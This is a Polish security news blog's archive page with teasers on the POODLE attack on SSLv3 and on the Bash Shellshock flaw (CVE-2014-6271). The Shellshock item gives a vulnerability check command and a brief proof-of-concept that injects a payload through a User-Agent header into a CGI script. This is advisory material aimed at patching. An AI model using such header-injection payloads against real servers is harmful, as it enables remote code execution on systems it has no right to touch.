Monthly Archives: październik 2014

SSLv3 umarł. Zjadł go pudel.

POODLE to nazwa nowego ataku, którego szczegóły wczoraj w nocy opublikowała trójka badaczy bezpieczeństwa z Google, w tym Krzysiek Kotowicz, którego możecie kojarzyć zartykułów na Niebezpieczniku i prowadzonych przez niego szkoleń z HTML5.

Najpierw 4 0day’e…

Wczorajszy dzień obfitował w 0day’e, czyli nieznane dotąd dziury, ale wykorzystywane przez przestępców w atakach. Najpierw opublikowano szczegóły ataków wykonywanych przez rosyjską grupę Sandworm, która za swój cel obrała m.in. polskie firmy energetyczne, a potem “łatkowy wtorek” Microsoftu ujawnił dodatkowe 3 0day’e (dwa z nich wykorzystywane przez Chińczyków w atakach na infrastrukturę przemysłową od ponad 5 miesięcy). Przeczytajcie koniecznie nasz wczorajszy artykuł na ten temat, aby dowiedzieć się na czym polegają błędy, jak wyglądają ataki i co zrobić, aby się załatać.

I wtedy pudel zamerdał ogonem…

Kiedy wszyscy aplikowali patche na Windowsach, na Twitterze już zapowiadano informacje na temat poważnego błędu w...

Uwaga! Dziura w Bashu pozwala na zdalne wykonanie kodu [CVE-2014-6271, shellshock]

Uwaga na CVE-2014-6271 — dzięki tej podatności w bashu (ale również sh i zsh, jak twierdzą niektórzy) można wykonać własny kod poprzez odpowiednią manipulację zmiennymi środowiskowymi. Aby sprawdzić, czy jesteście podatni na tę dziurę, której już nadano nazwę “shellshock”, wydajcie komendę: $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test" Jeśli pojawi się słowo “vulnerable” — jesteście podatni. Należy jak najszybciej wgrać łatkę. Przykładowy exploit: [root@host cgi-bin]# rm -fr /tmp/aa [root@host cgi-bin]# cat /var/www/cgi-bin/hi #!/bin/bash echo "Content-type: text/html" echo "" echo "hai" [root@host cgi-bin]# curl -k -H 'User-Agent: () { :;}; echo aa>/tmp/aa' https://localhost/cgi-bin/hi hai [root@host cgi-bin]# tail -n1 /var/log/httpd/ssl_access_log ::1 - - [24/Sep/2014:18:22:05 +0200] "GET /cgi-bin/hi HTTP/1.1" 200 4 "-" "() { :;}; echo aa>/tmp/aa" [root@host cgi-bin]# ls -l /tmp/aa -rw-r--r--. 1 apache apache 3 24 sept. 18:22 /tmp/aa [root@host cgi-bin]# sestatus SELinux status: enabled Na atak podatne są m.in. wszystkie programy/skrypty wykonywane w shellu basha, które...